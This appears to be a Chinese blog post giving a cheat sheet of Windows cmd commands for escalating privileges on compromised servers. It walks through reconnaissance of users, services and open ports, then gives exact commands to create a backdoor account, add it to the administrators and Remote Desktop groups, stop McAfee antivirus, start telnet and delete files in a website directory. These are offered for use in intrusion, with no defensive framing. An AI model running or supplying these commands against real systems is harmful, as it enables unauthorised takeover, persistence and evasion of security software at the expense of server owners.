提权常用DOS命令运用

写在前面，我只是个菜鸡，以前学过点，趁着现在没什么事情拿过来玩一下，想一起交流下的朋友加：1092417123，大家一起进步

1.运行环境

cmd 窗口中运行这些命令

2. DOS 命令

查看版本：ver

查看权限：whoami

tangyuan-pc 只是用户，这的 lizi 是管理员权限（一般电脑上的叫：Administrator）
在服务器中进行提权（以后会讲怎么提权），一般权限都是 user 的普通权限，或者是 guest （来宾）的权限

查看配置：systeminfo

我的出点问题，网上找的图，14年的，忽略这点

在这我们着重看一下处理器（几核的），多少位（32位很少了，但相对好提权，用 exp）

修补程序较少的服务器，用 exp 提权，希望很大
一般服务器 700+

查看用户：net user

查看进程：tasklist

查看正在运行的服务：tasklist /svc

主要是看着三个：serv-u mysql mssql

查看开放的所有端口：netstat -ano

主要是看着4个：3389（终端，连接到服务器的端口） 1433（mssql） 3306（mysql） 43958（serv-u）

查询会话情况：query user

当前这个服务器中有哪些用户正在访问这个服务器

查看指定服务的路径：sc qc mssql

添加一个用户：

net user jianmei daxia.asd /add

jianmei 是账号
daxia.asd 是密码

提升到管理权限：

net localgroup administrators jianmei /add

添加用户并提升权限：

net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

查看指定用户的信息：net user jianmei

查看所有管理权限的用户：net localgroup administrators

加入远程桌面用户组：net localgroup “Remote Desktop Users” jianmei /add

添加用户不成功的时候会提示你，再运行这句话就好

突破最大连接数：mstsc /admin /v:192.168.1.101

最后的是服务器的 IP 地址
运行 加入远程桌面用户组时，若有人设置了会提示这个问题

删除用户：net user jianmei /del

开启TELNET服务：net start telnet

关闭麦咖啡：net stop “McAfee McShield”

查看当前目录的所有文件：dir c:\windows\

查看指定文件的内容：

type C:\windows\Debug.txt

复制文件

把Debug.txt复制到C:\windows\addins\并命名为cmd.txt：

copy C:\windows\Debug.txt C:\windows\addins\cmd.txt

切换目录

切换到系统根目录：cd \

切换到windows目录：cd windwos

返回上一级目录：cd ..

进入系统e盘：e：

pushed命令

如果想直接进入某个指定的目录，可使用pushd命令。

如果直接进入c:\windows\system32\目录，可执行如下命令：Pushd c:\windows\system32\

创建ahackj文件夹：Md ahackj

删除ahakcj文件夹：Rd ahackj

删除网站目录下的ahackj.asp文件：

Del E:\xinyun\ahackj.asp